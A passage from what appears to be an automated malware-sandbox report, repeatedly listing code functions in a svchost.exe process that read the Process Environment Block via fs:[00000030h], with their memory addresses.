Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]	1_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]	1_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]	1_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]	1_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]	1_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]	1_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]	1_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]	1_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]	1_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]	1_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]	1_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]	1_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]	1_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]	1_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]	1_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]	1_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]	1_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]	1_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]	1_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]	1_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]	1_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]	1_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]	1_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]	1_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]	1_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]	1_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]	1_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]	1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]	1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]	1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]	1_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]	1_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]	1_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]	1_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]	1_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]	1_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]	1_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]	1_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]	1_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]	1_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]	1_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]	1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]	1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]	1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]	1_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]	1_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]	1_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]	1_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]	1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]	1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]	1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]	1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]	1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]	1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]	1_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]	1_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]	1_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]	1_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]	1_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]	1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]	1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]	1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]	1_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]	1_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]	1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]	1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]	1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]	1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]	1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]	1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]	1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]	1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]	1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]	1_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]	1_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]	1_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]	1_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]	1_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]	1_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]	1_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]	1_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]	1_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]	1_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]	1_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]	1_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]	1_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]	1_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]	1_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]	1_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]	1_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]	1_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]	1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]	1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]	1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]	1_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]	1_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]	1_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]	1_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]	1_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]	1_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]	1_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]	1_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]	1_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]	1_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]	1_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]	1_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]	1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]	1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]	1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]	1_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]	1_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]	1_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
